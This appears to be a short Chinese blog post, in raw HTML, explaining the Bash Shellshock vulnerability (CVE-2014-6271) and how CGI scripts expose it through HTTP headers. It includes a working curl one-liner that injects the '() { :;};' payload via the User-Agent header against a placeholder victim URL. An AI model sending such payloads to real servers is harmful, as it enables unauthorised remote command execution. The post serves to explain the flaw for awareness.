BASH漏洞初挖掘

admin

<p style="line-height: 24px; text-indent: 0em; text-align: center;"><font color="rgb(102, 102, 102)"><font face="微软雅黑,"> </font></font></p><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px; text-indent: 0em;">最近，BASH爆出来一个远程代码执行的漏洞<strong>CVE-2014-6271。</strong></p><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px; text-indent: 0em;">BASH除了可以将shell变量导出为环境变量，还可以将shell函数导出为环境变量！当前版本的bash通过以函数名作为环境变量名，以“（）{”开头的字串作为环境变量的值来将函数定义导出为环境变量。</p><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px; text-indent: 0em;"><strong>此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令!&nbsp;</strong></p><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px; text-indent: 0em;"><strong>例如</strong></p><p style="line-height: 24px; text-indent: nullem; text-align: center;"><font color="rgb(102, 102, 102)"><font face="微软雅黑,"> <br></font></font></p><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px; text-indent: 0em;">目前，接受HTTP命令的CGI Shell脚本是最主要的被攻击对象。一个常见的HTTP请求是这样：</p><pre class="prettyprint lang-html prettyprinted" style="padding: 8px; background-color: rgb(247, 247, 249); border: 1px solid rgb(225, 225, 232); white-space: pre-wrap; word-break: break-all; color: rgb(102, 102, 102); font-size: 13px; line-height: 24px;"><span class="pln" style="color: rgb(72, 72, 76);">GET&nbsp;/path?query-param-name=query-param-value&nbsp;HTTP/1.1
Host:&nbsp;www.example.com
Custom:&nbsp;custom-header-value</span></pre><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px;">&nbsp;CGI标准将http请求的所有部分都映射到了环境变量。例如对于Apache的Httpd，字串(){可以出现在以下这些地方：</p><pre class="prettyprint lang-html prettyprinted" style="padding: 8px; background-color: rgb(247, 247, 249); border: 1px solid rgb(225, 225, 232); white-space: pre-wrap; word-break: break-all; color: rgb(102, 102, 102); font-size: 13px; line-height: 24px;"><span class="pln" style="color: rgb(72, 72, 76);">*&nbsp;Host&nbsp;(“www.example.com”,&nbsp;as&nbsp;REMOTE_HOST)
*&nbsp;Header&nbsp;value&nbsp;(“custom-header-value”,&nbsp;as&nbsp;HTTP_CUSTOM&nbsp;in&nbsp;this&nbsp;example)
*&nbsp;Server&nbsp;protocol&nbsp;(“HTTP/1.1”,&nbsp;as&nbsp;SERVER_PROTOCOL)</span></pre><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px;">通过自定义这些参数的值为“函数环境变量”的形式，就可以远程执行命令！！！例如：<br></p><pre class="prettyprint lang-bash prettyprinted" style="padding: 8px; background-color: rgb(247, 247, 249); border: 1px solid rgb(225, 225, 232); white-space: pre-wrap; word-break: break-all; color: rgb(102, 102, 102); font-size: 13px; line-height: 24px;"><span class="pln" style="color: rgb(72, 72, 76);">curl&nbsp;</span><span class="pun" style="color: rgb(147, 161, 161);">-</span><span class="pln" style="color: rgb(72, 72, 76);">H&nbsp;</span><span class="typ" style="color: teal;">User</span><span class="pun" style="color: rgb(147, 161, 161);">-</span><span class="typ" style="color: teal;">Agent</span><span class="pun" style="color: rgb(147, 161, 161);">:</span><span class="pln" style="color: rgb(72, 72, 76);">&nbsp;</span><span class="pun" style="color: rgb(147, 161, 161);">()</span><span class="pln" style="color: rgb(72, 72, 76);">&nbsp;</span><span class="pun" style="color: rgb(147, 161, 161);">{</span><span class="pln" style="color: rgb(72, 72, 76);">&nbsp;</span><span class="pun" style="color: rgb(147, 161, 161);">:;};</span><span class="pln" style="color: rgb(72, 72, 76);">&nbsp;echo&nbsp;fuck&nbsp;you</span><span class="pun" style="color: rgb(147, 161, 161);">!</span><span class="pln" style="color: rgb(72, 72, 76);">&nbsp;
http</span><span class="pun" style="color: rgb(147, 161, 161);">://</span><span class="pln" style="color: rgb(72, 72, 76);">xxxxx</span><span class="pun" style="color: rgb(147, 161, 161);">/</span><span class="pln" style="color: rgb(72, 72, 76);">victim</span><span class="pun" style="color: rgb(147, 161, 161);">.</span><span class="pln" style="color: rgb(72, 72, 76);">sh</span></pre><p style="padding-top: 6px; padding-bottom: 4px; overflow: hidden; color: rgb(102, 102, 102); font-family: 微软雅黑, 'Microsoft YaHei', 'WenQuanYi Micro Hei'; font-size: 13px; line-height: 24px;">此外，OpenSSH也因其AcceptEnv、TERM、SSH_ORIGINAL_COMMAND等环境变量受此漏洞影响。目前还有更多的受影响程序和利用方式正在不断地被发掘出来！</p><p style="line-height: 24px; text-indent: nullem; text-align: left;"><font color="rgb(102, 102, 102)"><font face="微软雅黑,"><b>参考信息来源<font color="#238357"><a href="http://seclists.org/oss-sec/2014/q3/649" target="_blank">http://seclists.org/oss-sec/2014/q3/649</a></font></b></font></font></p><br>